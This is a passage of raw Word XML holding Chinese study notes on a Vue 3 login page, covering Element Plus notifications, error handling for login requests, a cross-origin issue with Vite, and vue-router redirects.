        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                console.log(err.response.msg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E23396" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A77BE8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1ABAD" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483EFCE" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44937127" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            console.log('error submit!!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6768AB4C" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35808369" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E3634" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B22150" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B4CB48" w14:textId="77777777" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70593342" w14:textId="79E78576" w:rsidR="00A77BE8" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32924D91" w14:textId="77777777" w:rsidR="006E5D70" w:rsidRDefault="006E5D70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3298AF7E" w14:textId="6B05E92E" w:rsidR="00A77BE8" w:rsidRPr="006E5D70" w:rsidRDefault="006E5D70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>then()</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>catch()</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>取决于响应码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70F204" w14:textId="288786E3" w:rsidR="00A77BE8" w:rsidRDefault="006E5D70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="724E8DBA" wp14:editId="09769434">
            <wp:extent cx="5274310" cy="2937510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1620566783" name="图片 1" descr="截图里有图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66783" name="图片 1" descr="截图里有图片&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId198"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2937510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8357FF" w14:textId="77777777" w:rsidR="006E5D70" w:rsidRDefault="006E5D70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443915B1" w14:textId="42EB2FE6" w:rsidR="00DE164E" w:rsidRDefault="00A77BE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没有配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00FF44BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了跨域问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D020DE0" w14:textId="732FF0F2" w:rsidR="00DE164E" w:rsidRDefault="00FF44BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="113B6A27" wp14:editId="03AB3AB1">
            <wp:extent cx="3591889" cy="2134549"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="884505824"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05824" name="图片 1" descr="图形用户界面, 应用程序, Word&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3594866" cy="2136318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB3DC4" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDD578E" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0974A3C7" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABBBDD1" w14:textId="1427F22C" w:rsidR="00DE164E" w:rsidRDefault="00B6650F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计网页弹窗动作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63546982" w14:textId="2250C83A" w:rsidR="00F53486" w:rsidRDefault="00F53486" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的弹窗组件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6DE16D" w14:textId="60381A43" w:rsidR="00DE164E" w:rsidRDefault="00B6650F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B6650F">
        <w:t>https://element-plus.org/zh-CN/component/notification.html#%E5%9F%BA%E7%A1%80%E7%94%A8%E6%B3%95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DFF04" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48689697" w14:textId="0E2BF71B" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自行修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中要弹出什么文字内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D538F4D" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D19199" w14:textId="29AD3445" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { ElNotification } from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E645CC6" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E4ED04" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>login(form.username, form.password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3165A073" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C92822" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    console.log(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15575A" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4D79C" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .catch(err =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D90532F" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // console.log(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D43846" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // console.log(err.response.data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F9531" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    // console.log()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B68BE" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRPr="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E2940" w14:textId="79C71823" w:rsidR="003C66C5" w:rsidRPr="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidR="00BA6DEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>title: 'Error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC14921" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRPr="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        message: err.response.data.msg || "</w:t>
      </w:r>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请求失败</w:t>
      </w:r>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F3868" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRPr="00BA6DEB" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        type: 'error</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE0F74A" w14:textId="2B0C20A5" w:rsidR="00BA6DEB" w:rsidRPr="00BA6DEB" w:rsidRDefault="00BA6DEB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BA6DEB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>duration: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C390DA" w14:textId="77777777" w:rsidR="003C66C5" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003C66C5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD365C" w14:textId="5A98AEF8" w:rsidR="00DE164E" w:rsidRDefault="003C66C5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B5592" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728E75F6" w14:textId="70DEFE76" w:rsidR="00DE164E" w:rsidRDefault="00202309" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相应成功如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418ED61E" w14:textId="71ABD4BE" w:rsidR="00202309" w:rsidRDefault="00202309" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680D768E" wp14:editId="1F22F704">
            <wp:extent cx="3788633" cy="2044840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2128163595"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63595" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId200"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3793300" cy="2047359"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5059D9" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B93C0DC" w14:textId="64A951B6" w:rsidR="00DE164E" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>跳转到后台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E817E" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDB7EF2" w14:textId="6CD7E9AD" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E26175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26175">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-router </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>然后在动作里执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> push</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26175">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E26175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就可以完成跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD62756" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5223D6E4" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { ref, reactive } from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F7BDF3" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import { User, Lock } from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123EEAF2" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { login } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C80D53" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { ElNotification } from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75641692" w14:textId="1FB3E09A" w:rsidR="00247D35" w:rsidRPr="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00247D35">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useRouter } from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5A8864" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722F67AD" w14:textId="0C8DED7F" w:rsidR="00DE164E" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00247D35">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const router = useRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA941B9" w14:textId="77777777" w:rsidR="00DE164E" w:rsidRDefault="00DE164E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8A4A25" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">           login(form.username, form.password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDA820" w14:textId="73E74263" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2BDFA" w14:textId="09EABF16" w:rsidR="00247D35" w:rsidRPr="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    console.log(res.data.data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F0EC9" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    ElNotification({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12573599" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        message: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AFFCBC" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        type: 'sucess',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F7D15" w14:textId="77777777" w:rsidR="00247D35" w:rsidRDefault="00247D35" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
